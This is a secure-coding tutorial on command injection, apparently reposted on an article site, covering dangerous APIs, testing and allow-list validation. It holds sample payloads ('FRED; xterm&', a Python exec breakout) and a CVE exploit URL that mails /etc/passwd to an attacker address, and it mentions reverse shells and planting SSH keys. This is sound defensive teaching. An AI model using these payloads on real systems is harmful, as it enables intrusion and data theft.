Command injection

Entry Notes

Posted: 03232007
Author: Hendra Fang
Category: Software



In 1994, the author of this tutorial was sitting in front of an SGI computer running IRIX that was simply showing the login screen. It gave the option to print some documentation and specify the printer to use. The author imagined what the implementation might be, specified a string that didn’t actually refer to a printer, and suddenly had an administrator window on a box the author not only wasn’t supposed to have access to, but also wasn’t even logged into.

The problem was a command injection attack, where user input that was meant to be data actually can be partially interpreted as a command of some sort. Often, that command can give the person with control over the data access to far more access than was ever intended.

Affected Languages

Command injection problems are a worry anytime commands and data are placed inline together. While languages can get rid of some of the most straightforward command injection attacks by providing good Application Programming Interfaces (APIs) that perform proper input validation, there is always the possibility that new APIs will introduce new kinds of command injection attacks.

The Sin Explained

Command injection problems occur when untrusted data is placed into data that is passed to some sort of compiler or interpreter, where the data might, if it’s formatted in a particular way, be treated as something other than data.

The canonical example for this problem has always been API calls that directly call the system command interpreter without any validation. For example, the old IRIX login screen (mentioned previously) was doing something along the lines of:

char buf[1024]; 
 snprintf(buf, "system lpr -P %s", user_input, sizeof(buf)-1); 
 system(buf);

In this case, the user was unprivileged, since it could be absolutely anyone wandering by a workstation. Yet, simply by typing the text: FRED; xterm&, a terminal would pop up, because the ; would end the original command in the system shell; and the xterm command would create a whole new terminal window ready for commands, with the & telling the system to run the process without blocking the current process. (In the Windows shell, the ampersand metacharacter acts the same as a semicolon on a UNIX box.) And, since the login process had administrative privileges, the terminal it created would also have administrative privileges!

There are plenty of functions across many languages that are susceptible to such attacks, as you’ll see later. But, a command injection attack doesn’t require a function that calls to a system shell. For example, an attacker might be able to leverage a call to a language interpreter. This is pretty popular in high-level languages such as Perl and Python. For example, consider the following Python code:

def call_func(user_input, system_data): 
 exec 'special_function_%s("%s")' % (system_data, user_input

In the preceding code, the Python % operator acts much like *printf specifiers in C. They match up values in the parentheses with %s values in the string. As a result, this code is intended to call a function chosen by the system, passing it the argument from the user. For example, if system_data were sample and user_input were fred, Python would run the code:

special_function_sample("fred")

And, this code would run in the same scope that the exec statement is in.

Attackers who control user_input can execute any Python code they want with that process, simply by adding a quote, followed by a right parenthesis and a semicolon. For example, the attacker could try the string:

fred"); print ("foo

This will cause the function to run the following code:

special_function_sample("fred"); print ("foo")

This will not only do what the programmer intended, but will also print foo. Attackers can literally do anything here, including erase files with the privileges of the program, or even make network connections. If this flexibility gives attackers access to more privileges than they otherwise had, this is a security problem.

Many of these problems occur when control constructs and data are juxtaposed, and attackers can use a special character to change the context back to control constructs. In the case of command shells, there are numerous magical characters that can do this. For example, on most UNIX-like machines, if the attackers were to add a semicolon (which ends a statement), backtick (data between backticks gets executed as code), or a vertical bar (everything after the bar is treated as another, related process), they could run arbitrary commands. There are other special characters that can change the context from data to control; these are just the most obvious.

One common technique for mitigating problems with running commands is to use an API to call the command directly, without going through a shell. For example, on a UNIX box, there’s the execv() family of functions, which skips the shell and calls the program directly, giving the arguments as strings.

This is a good thing, but it doesn’t always solve the problem, particularly because the spawned program itself might put data right next to important control constructs. For example, calling execv() on a Python program that then passes the argument list to an exec would be bad. We have even seen cases where people execv()’d /bin/sh (the command shell), which totally misses the point.

Related Sins

A few of the sins can be viewed as specific kinds of command injection problems. SQL injection is clearly a specific kind of command injection attack. Format string problems can be seen as a kind of command injection problem, too. This is because the attacker takes a value that the programmer expected to be data, and then inserts read and write commands (for example, the %n specifier is a write command). Those particular cases are so common that we’ve treated them separately.

This is also the core problem in cross-site scripting, where attackers can chose data that looks like particular web control elements if that data is not properly validated.

Spotting the Sin Pattern

Here are the elements to the pattern:

  • Commands (or control information) and data are placed inline next to each other.

  • There is some possibility that the data might get treated as a command, often due to characters with special meanings, such as quotes and semicolons.

  • Control over commands would give users more privileges than they already have.

Spotting the Sin During Code Review

There are numerous API calls and language constructs across a wide variety of different programming languages that are susceptible to this problem. A good approach to reviewing code for this problem is to first identify every construct that could possibly be used to invoke any kind of command processor (including command shells, a database, or the programming language interpreter itself). Then, look through the program to see if any of those constructs are actually used. If they are, then check to see whether a suitable defensive measure is taken. While defensive measures can vary based on the sin, one should usually be skeptical of deny-list-based approaches, and favor allow-list approaches (see the “Redemption Steps” section that follows).

Here are some of the more popular constructs to be worried about:

Language Construct Comments
C/C++ system(), popen(),
execlp(), execvp()
Posix
C/C++ The ShellExecute() family
of functions; _wsystem()
Win32 only
Perl system If called as one argument, can
call the shell if the string has
shell metacharacters.
Perl exec Similar to system, except ends
the Perl process.
Perl backticks(`) Will generally invoke a shell.
Perl open If the first or last character of the filename is a vertical bar, then Perl opens a pipe instead. This is done by calling out to the shell, and the rest of the filename becomes data passed through the shell.
Perl Vertical bar operator This acts just like the Posix
popen() call.
Perl eval Evaluates the string argument
as Perl code.
Perl Regular expression /e operator Evaluates a pattern-matched portion of a string as Perl code.
Python exec, eval Data gets evaluated as code.
Python os.system, os.popen These delegate to the underlying posix calls.
Python execfile This is similar to exec and eval, but takes the data to run from the specified file. If the attacker can influence the contents of the file, the same problem occurs.
Python input Equivalent to eval(raw_input()),so this actually executes the user’s text as code!
Python compile The intent of compiling text into code is ostensibly that it’s going to get run!
Java Class.forName(String name), Class.newInstance() Java byte code can be dynamically loaded and run. In some cases, the code will be sandboxed when coming from an untrusted user (particularly when writing an applet).
Java Runtime.exec() Java attempted to do the secure thing by not giving any direct facility to call a shell. But shells can be so convenient for some tasks that many people will call this with an argument that explicitly invokes a shell.

Testing Techniques to Find the Sin

Generally, the thing to do is to take every input, think of what kind of command shell it could possibly get passed off to, then try sticking in each metacharacter for that shell, and see if it blows up. Of course, you want to choose inputs in a way that, if the metacharacter works, something measurable will actually happen.

For example, if you want to test to see if data is passed to a UNIX shell, add a semicolon, and then try to mail yourself something. But, if the data is placed inside a quoted string, you might have to insert an end quote to get out. To cover this, you might have a test case that inserts a quote followed by a semicolon, then a command that mails yourself something. Check if it crashes or does other bad things, as well as if you get e-mail; your test case might not perform the exact attack sequence, but it might be close enough that it can still reveal the problem. While there are a lot of possible defenses, in practice, you probably won’t need to get too fancy. You usually can create a simple program that creates a number of permutations of various metacharacters (control characters that have special meanings, such as ;) and commands, send those to various inputs, and see if something untoward results.

Tools from companies such as SPI Dynamics and Watchfire automate this kind of testing for web-based applications.

Example Sins

The following entries on the Common Vulnerabilities and Exposures (CVE) web site (http://cve.mitre.org) are examples of command injection attacks.

CAN-2001-1187

The CSVForm Perl Common Gateway Interface (CGI) script adds records to a comma- separated value (CSV) database file. OmniHTTPd 2.07 web server ships with a script called statsconfig.pl. After the query is parsed, the filename (passed in the file parameter) gets passed to the following code:

sub modify_CSV { if(open(CSV,$_[0])){ … }

There’s no input validation done on the filename, either. So you can use the cruel trick of adding a pipe to the end of the filename.

An example exploit would consist of visiting the following URL:

http://www.example.com/cgi-bin/csvform.pl?file=mail%20attacker@attacker.org</etc/passwd|

On a UNIX system, this will e-mail the system password file to an attacker.

Note that the %20 is a URL-encoded space. The decoding gets done before the CGI script gets passed its data.

The example exploit we give isn’t all that interesting these days, because the UNIX password file only gives usernames. Attackers will probably decide to do something instead that will allow them to log in, such as write a public key to ~/.ssh/authorized_keys. Or, attackers can actually use this to both upload and run any program they want by writing bytes to a file. Since Perl is obviously already installed on any box running this, an obvious thing to do would be to write a simple Perl script to connect back to the attacker, and on connection, give the attacker a command shell.

CAN-2002-0652

The IRIX file system mounting service allows for remote file system mounting over RPC calls, and is generally installed by default. It turns out that, up until the bug was found in 2002, many of the file checks that the server needed to make when receiving a remote request were implemented by using popen() to run commands from the command line. The information used in that call was taken directly from the remote user, and a well-placed semicolon in the RPC parameter would allow the attacker to run shell commands as root on the box.

Redemption Steps

The obvious thing to do is to never invoke a command interpreter of any sort. But, that isn’t always practical, especially when using a database. Similarly, it would be just about as useful to say that if you do have to use a command shell, don’t use any external data in it. That just isn’t practical advice in most cases.

The only worthwhile answer is to do validation. The road to redemption is quite straightforward here:

  1. Check the data to make sure it is okay.

  2. Take an appropriate action when the data is invalid.

Data Validation

At the highest level, you have two choices. You can either validate everything you’re going to ship off to the external process, or you can just validate the parts that are input from untrusted sources. Either one is fine, as long as you’re thorough about it.

It’s usually a good idea to validate external data right before you use it. There are a couple of reasons for this. First, it ensures that the data gets examined on every data path leading up to that use. Second, the semantics of the data are often best understood right before using the data. This allows you to be as accurate as possible with your input validation checks. It also is a good defense against the possibility of the data being modified in a bad way after the check.

Ultimately, however, a defense-in-depth strategy is best here. It’s also good to check data as it comes in so that there is no risk of it being used without being checked elsewhere. Particularly if there are lots of places where the data can be abused, it might be easy to overlook a check in some places.

There are three prominent ways to determine data validity:

  • The deny-list approach You look for matches demonstrating that the data is invalid, and accept everything else as valid.

  • The allow-list approach You look for the set of valid data, and reject anything else (even if there’s some chance it wasn’t problematic).

  • The “quoting” approach You transform data so that there cannot be anything unsafe.

All of these approaches have the drawback that you might forget something important. In the case of deny-lists and quoting, this could obviously have bad security implications. In fact, it’s unlikely that you’ll end up with secure software using a deny-list approach if you’re passing the data to some kinds of systems (such as shells), because the list of characters that can have special meaning is actually quite lengthy. For some systems, just about anything other than letters and digits can have a special meaning. Quoting is also much more difficult than one might think. For example, when one is writing code that performs quoting for some kinds of command processors, it’s common to take a string, and stick it in quotes. If you’re not careful, attackers can just throw their own quotes in there. And, with some command processors, there are even metacharacters that have meaning inside a quoted string (this includes UNIX command shells).

To give you a sense of how difficult it can be, try to write down every UNIX shell metacharacter on your own. Include everything that may be taken as control, instead of data. How big is your list?

Our list includes every piece of punctuation except @, _, +, :, and the comma. And we’re not sure that those characters are universally safe. There might be shells where they’re not.

You may think you have some other characters that can never be interpreted with special meaning. A minus sign? That might be interpreted as signaling the start of a command-line option if it’s at the start of a word. How about the carat (^)? Did you know it does substitution? How about the % sign? While it might often be harmless when interpreted as a metacharacter, it is a metacharacter in some circumstances, because it does job control. The tilde (~) is similar in that it will, in some scenarios, expand to the home directory of a user if it’s at the start of a word, but otherwise it will not be considered a metacharacter. That could be an information leakage or worse, particularly if it is a vector for seeing a part of the file system that the program shouldn’t be able to see. For example, you might stick your program in /home/blah/application, and then disallow double dots in the string. But the user might be able to access anything in /home/blah just by prefixing with ~blah.

Even spaces can be control characters, because they are used to semantically separate between arguments or commands. There are many types of spaces with this behavior, including tabs, new lines, carriage returns, form feeds, and vertical tabs.

Plus, there can be control characters like CTRL-D and the NULL character that can have undesirable effects.

All in all, it’s much easier to use an allow-list. If you’re going to use a deny-list, you’d better be incredibly sure you’re covering all your bases. But, allow-lists alone may not be enough. Education is definitely necessary, because even if you’re using an allow-list, you might allow spaces or tildes without realizing what might happen in your program from a security perspective.

Another issue with allow-lists is that you might have unhappy users because inputs that should be allowed aren’t. For example, you might not allow a “+” in an e-mail address, but find people who like to use them to differentiate who they’re giving their e-mail address to. Still, the allow-list approach is strongly preferable to the other two approaches.

Consider the case where you take a value from the user that you’ll treat as a filename. Let’s say you do validation as such (this example is in Python):

for char in filename: 
 if (not char in string.ascii_letters and not char in string.digits  and char <> '.'): 
 raise "InputValidationError"

This allows periods so that the user can type in files with extensions, but forgets about the underscore, which is common. But, with a deny-list approach, you might not have thought to disallow the slash, which would be bad; an attacker could use it plus the dots to access files elsewhere on the filesystem, beyond the current directory. With a quoting approach, you would have had to write a much more complex parsing routine.

It’s common to use regular expressions to perform this kind of test. Regular expressions are easy to get wrong, however, especially when they become complex. If you want to handle nested constructs and such, forget about it.

Generally, from a security view, it’s better to be safe than sorry. Using regular expressions can lead to easy rather than safe practices, particularly when the most precise checks would require more complex semantic checking than a simple pattern match.

When a Check Fails

There are three general strategies to dealing with a failure. They’re not even mutually exclusive. It’s good to always do at least the first two:

  • Signal an error (of course, refuse to run the command as-is). Be careful how you report the error, however. If you just copy the bad data back, that could become the basis for a cross-site scripting attack. You also don’t want to give the attacker too much information (particularly if the check uses run-time configuration data), so sometimes it’s best to simply say “invalid character” or some other vague response.

  • Log the error, including all relevant data. Be careful that the logging process doesn’t itself become a point of attack; some logging systems accept formatting characters, and trying to naively log some data (such as carriage returns and linefeeds) could end up corrupting the log.

  • Modify the data to be valid, either replacing it with default values or transforming it.

We don’t generally recommend the third option. Not only can you make a mistake, but also when you don’t make a mistake, but the end user does, the semantics can be unexpected. It’s easier to simply fail, and do so safely.

Extra Defensive Measures

If you happen to be using Perl, the language has facilities to help you detect this kind of error at run time. It’s called taint mode. The basic idea is that Perl won’t let you send unsanitized data to one of the bad functions above. But, the checks only work in taint mode, so you get no benefit if you don’t run it. Plus, you can accidentally un-taint data without really having validated anything. There are other minor limitations, too, so it’s good not to rely solely upon this mechanism. Nonetheless, it’s still a great testing tool, and usually worth turning on as one of your defenses.

For the common API calls that invoke command processors, you might want to write your own wrapper API to them that does allow-list filtering, and throws an exception if the input is bad. This shouldn’t be the only input validation you do because, often, it’s better to perform more detailed sanity checks on data values. But, it’s a good first line of defense, and it’s easy to enforce. You can either make the wrappers replace the “bad” functions, or you can use a simple search tool in code auditing to find all the instances you missed and quickly make the right replacement.

Conclusions

  • Do perform input validation on all input before passing it to a command processor.

  • Do handle the failure securely if an input validation check fails.

  • Do not pass unvalidated input to any command processor, even if the intent is that the input will just be data.

  • Do not use the deny-list approach, unless you are 100 percent sure you are accounting for all possibilities.

  • Consider avoiding regular expressions for input validation; instead, write simple and clear validators by han

Related Articles

1. Backup Types
Backup software can use or ignore the archive bit in determining which f...

2. An overview on Software Components of a PC
Many people think of a PC as comprising solely physical hardware, but ha...

3. Malware Self Preservation Techniques
We've discussed a variety of defensive techniques to fight viruses. Howe...

4. Virus Propagation Mechanisms
As we've seen, once a virus is activated on a computer system, it knows ...

5. Infecting Boot Sectors
To understand the purpose of a boot sector and the reasons why a virus m...

6. Worm Defenses
So, highly destructive worms might be on the way. Computer investigation...


All articles in this directory are property of their respective authors.
Contact us | Terms of Service | Privacy Policy

© 2012 E-articles.info - All Rights Reserved.